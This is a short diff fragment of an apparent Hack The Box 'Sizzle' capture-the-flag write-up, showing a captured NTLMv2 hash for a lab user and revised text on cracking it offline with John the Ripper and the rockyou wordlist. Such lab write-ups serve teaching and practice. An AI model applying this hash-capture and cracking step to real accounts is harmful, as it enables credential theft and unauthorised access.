axcheron/axcheron.github.io/_htb/09_writeup_sizzle.md

 [SMB] NTLMv2-SSP Hash     : amanda::HTB:8a7e87c1233bc727:D2FE0898E458F50CE1058E063C2E11BE:010100000000000000CF78A4A921D801AC2B3950B152C1C4000000000200080031004B005000410001001E00570049004E002D00500031004800450031004400370050005A003100570004003400570049004E002D00500031004800450031004400370050005A00310057002E0031004B00500041002E004C004F00430041004C000300140031004B00500041002E004C004F00430041004C000500140031004B00500041002E004C004F00430041004C000700080000CF78A4A921D8010600040002000000080030003000000000000000010000000020000059F2C79AD3F324A2CB03F298893ECE8E71C147E0FE3F16F742F2FBA88ADBD0A30A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E0032003800000000000000000000000000
 ```

+## Password Cracking

-Here, we used [John the Ripper](https://github.com/openwall/john) to crack the password, but it can be done with other tools like [hashcat](https://hashcat.net/hashcat/).
+Now, we just have to crack the recovered hash offline using the *rockyou* password list (if you are using Kali Linux, it should be present in the `/usr/share/wordlists/` folder).
+Here, we used [John the Ripper](https://github.com/openwall/john) to crack the password, but it can be done with other tools.

 ```bash
 $ john hash.txt -w=/usr/share/wordlists/rockyou.txt